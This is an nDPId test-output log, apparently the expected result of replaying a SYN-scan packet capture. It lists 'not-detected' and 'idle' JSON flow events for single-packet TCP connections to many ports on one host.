+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1961,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":179,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":917,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4279,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":917,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4279,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":980,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4279,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":980,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4279,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1669,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8383,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1669,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8383,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1733,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061051,"flow_last_seen":1278275061051,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8383,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1733,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061051,"flow_last_seen":1278275061051,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8383,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00591{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":199,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":199,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":199,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":199,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":461,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6346,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":461,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6346,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1851,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2251,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1851,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2251,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":487,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6346,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":487,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6346,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1910,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061308,"flow_last_seen":1278275061308,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2251,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1910,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061308,"flow_last_seen":1278275061308,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2251,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":435,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8400,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":435,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8400,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":472,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8400,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":472,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8400,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1096,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8402,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1096,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8402,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1159,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8402,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1159,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8402,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1030,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060067,"flow_last_seen":1278275060067,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":211,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1030,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060067,"flow_last_seen":1278275060067,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":211,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1075,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":211,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1075,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":211,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":564,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059408,"flow_last_seen":1278275059408,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":212,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":564,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059408,"flow_last_seen":1278275059408,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":212,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":431,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2260,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":431,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2260,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":656,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":212,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":656,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":212,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":476,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2260,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":476,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2260,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1192,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":222,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1192,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1264,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":222,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1264,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1387,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":24800,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1387,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":24800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 